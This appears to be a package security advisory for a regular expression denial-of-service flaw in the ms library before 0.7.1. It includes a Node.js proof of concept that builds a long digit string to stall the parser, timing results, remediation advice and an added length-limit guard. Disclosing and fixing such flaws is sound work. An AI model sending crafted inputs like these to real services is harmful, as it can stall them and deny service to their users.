Severity: moderate

Regular Expression Denial of Service

ms

Overview

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

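// Usage: node ms.js <length>
var ms = require('ms');

// Build a string of len + 1 copies of chr.
var genstr = function (len, chr) {
   var result = "";
   for (var i = 0; i <= len; i++) {
       result = result + chr;
   }

   return result;
};

// A long run of digits followed by a unit that does not match.
ms(genstr(parseInt(process.argv[2], 10), "5") + " minutea");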
 

Results

Execution time increases with the length of the input string:

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s

Remediation

Update to version 0.7.1 or later. Alternatively, apply a reasonable length limit to parsed version strings.
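
The length limit suggested above, as an added example (not code from this advisory or from the ms project). The names `parseDurationBounded` and `standInParse`, the stand-in regex, and the 100-character cap are assumptions; in real use the `parse` argument would be the application's own parser.

```javascript
// Assumed cap: durations typed by a person ("5 minutes", "1.5h") are short.
const MAX_DURATION_LENGTH = 100;

const UNIT_MS = { ms: 1, s: 1000, m: 60000, h: 3600000 };

// Constructed stand-in for a regex-based duration parser; it is not the ms
// source. An optional digit run followed by a required one backtracks
// heavily on a long digit string whose tail fails to match.
function standInParse(str) {
  const m = /^((?:\d+)?\.?\d+) *(ms|seconds?|s|minutes?|m|hours?|h)?$/i.exec(str);
  if (!m) return undefined;
  const unit = (m[2] || 'ms').toLowerCase();
  return parseFloat(m[1]) * UNIT_MS[unit === 'ms' ? 'ms' : unit[0]];
}

// Reject oversized or non-string input before any regex sees it, so the
// cost of the check is constant no matter how long the input is.
function parseDurationBounded(input, parse, maxLength = MAX_DURATION_LENGTH) {
  if (typeof input !== 'string') {
    throw new TypeError('duration must be a string');
  }
  if (input.length === 0 || input.length > maxLength) {
    throw new RangeError('duration length ' + input.length + ' is outside 1..' + maxLength);
  }
  return parse(input);
}

// Constructed inputs: one normal value, one shaped like the proof of concept.
function demo() {
  let calls = 0;
  const counted = (s) => { calls += 1; return standInParse(s); };
  const accepted = parseDurationBounded('5 minutes', counted);
  let rejected = null;
  try {
    parseDurationBounded('5'.repeat(80001) + ' minutea', counted);
  } catch (err) {
    rejected = err.name;
  }
  return { accepted, rejected, parserCalls: calls };
}

console.log(demo());
```

The oversized input is rejected without the parser being called, so the regex never runs on it.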

Advisory timeline

  1. published

    Advisory published
    Oct 24th, 2015

  2. reported

    Oct 24th, 2015